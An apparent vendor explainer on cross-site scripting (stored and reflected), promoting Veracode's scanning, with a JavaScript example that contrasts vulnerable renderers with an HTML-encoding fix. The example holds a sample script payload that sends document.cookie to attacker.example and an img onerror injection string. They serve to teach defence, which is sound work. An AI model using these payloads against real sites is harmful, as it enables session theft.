XSS - Cross-Site Scripting Defined

XSS, or cross-site scripting, is a type of web application security vulnerability that occurs when an attacker uses a legitimate web application to deliver malicious code to other users. XSS is possible when a web application includes user-supplied input in a page's content without validating or encoding that data. This lets an attacker inject a script into the application's output, and an unsuspecting user's browser executes it because it appears to come from the "trusted" website. The injected script runs in the context of the site's origin, so the attacker can read session tokens, cookies, sensitive user data and other objects the browser holds for that website. According to the Open Web Application Security Project (OWASP), XSS is now the most prevalent type of web security vulnerability. Recent XSS attacks have ranged in severity from defacement, such as redirecting visitors from Barack Obama's campaign website to Hillary Clinton's website, to issues within popular open source platforms, to identity and credit card theft, such as tricking users of PayPal's website into providing sensitive data.

Anatomy of XSS Attacks

With over 25% of all web vulnerabilities attributed to XSS, it is the most common software vulnerability and should be top of mind for web developers and security personnel. In general, XSS attacks are delivered in two ways. In the first, usually called "stored" or "persistent" XSS, a malicious user submits a script to the vulnerable website, which saves it and displays it on pages that other users will visit, such as a blog post, message board or comment field. When a user views the compromised page, their browser executes the script. The second form is commonly called a "reflected" attack. Here the attacker embeds the script in a crafted link, for example in an email or behind an image, and when the user clicks it the payload is sent to the vulnerable website as part of the request; the site reflects it back, unencoded, in its response, and the user's browser executes it.
Regardless of the method used to launch an XSS attack, the result is the same: the user's browser executes code created by the attacker because it appears to come from the "trusted" website.

Finding and Remediating XSS Vulnerabilities with Veracode

Veracode's SecurityReview enables organizations to quickly identify and remediate XSS vulnerabilities in web applications. Veracode uses static binary analysis and dynamic vulnerability scanning to model a web application, locate all of its user inputs and determine whether each input can be used to exploit an XSS vulnerability. Unlike approaches that simply look for software versions known to have XSS vulnerabilities, Veracode exercises each input with test data to assess every potential attack vector. Because Veracode uses non-destructive input testing, the technique can be used on "live" websites without harming users, data or performance. Once an XSS vulnerability is detected, the organization is given remediation details: the location of the vulnerability, the data used to trigger it and the steps needed to properly sanitize the input. Application developers should always validate user input and encode it for the context in which it is output before using it in dynamically generated content; a detailed technical guide with coding examples is available on the Common Weakness Enumeration (CWE) website.
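The stored and reflected cases described under "Anatomy of XSS Attacks", together with the output-encoding fix recommended above, as an added example that is not from the original page and is not Veracode's code. It is a minimal server-side rendering layer: the vulnerable renderers concatenate user input straight into HTML, the hardened ones pass it through an HTML encoder first. The function names, the hosts shop.example and attacker.example, and the two payload strings are assumptions constructed for illustration, not real attack traffic.

```javascript
// Added example (not the page's or Veracode's code): stored and reflected XSS
// in a toy page renderer, beside the output-encoded fix. All names, hosts and
// payloads below are constructed for illustration.

// --- Stored XSS: comments are persisted and rendered for every later visitor.
const commentStore = [];

function postComment(text) {
  commentStore.push(text); // stored exactly as submitted, no encoding here
}

// Vulnerable: user data is interpolated directly into the HTML body.
function renderCommentsUnsafe() {
  return commentStore.map(c => `<p class="comment">${c}</p>`).join("\n");
}

// Encode the characters that change meaning in an HTML text node or a
// double-quoted attribute value. The browser decodes the entities back to
// literal characters for display, so legitimate input is not mangled.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;"
  })[ch]);
}

// Hardened: encoding happens at the point where data enters the HTML,
// regardless of whether it came from storage or from the current request.
function renderCommentsSafe() {
  return commentStore.map(c => `<p class="comment">${escapeHtml(c)}</p>`).join("\n");
}

// --- Reflected XSS: a search page that echoes the query parameter back.
function renderSearchUnsafe(url) {
  const q = new URL(url).searchParams.get("q") || "";
  return `<input name="q" value="${q}"><h2>Results for ${q}</h2>`;
}

function renderSearchSafe(url) {
  const q = new URL(url).searchParams.get("q") || "";
  const e = escapeHtml(q);
  return `<input name="q" value="${e}"><h2>Results for ${e}</h2>`;
}

// Lists the tag names that actually open in the rendered markup. Any tag
// beyond the ones the template itself emits came from user input.
function tagNames(html) {
  return Array.from(html.matchAll(/<([a-zA-Z][\w-]*)/g), m => m[1].toLowerCase());
}

// Constructed sample inputs.
const STORED_PAYLOAD =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
const REFLECTED_URL =
  "https://shop.example/search?q=" +
  encodeURIComponent('"><img src=x onerror=alert(document.domain)>');

postComment("Great product!");
postComment(STORED_PAYLOAD);

// Summarises which renderers let user-controlled tags into the page.
function demo() {
  return {
    unsafeComments: tagNames(renderCommentsUnsafe()),            // ["p","p","script"]
    safeComments: tagNames(renderCommentsSafe()),                // ["p","p"]
    unsafeSearch: tagNames(renderSearchUnsafe(REFLECTED_URL)),   // ["input","img","h2","img"]
    safeSearch: tagNames(renderSearchSafe(REFLECTED_URL)),       // ["input","h2"]
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Note that escapeHtml is only correct for HTML text and double-quoted attribute contexts. Input that lands inside a JavaScript string, a URL, a CSS value or an unquoted attribute needs the encoder for that context; a templating library with automatic, context-aware encoding removes the need to get this right by hand at every output point.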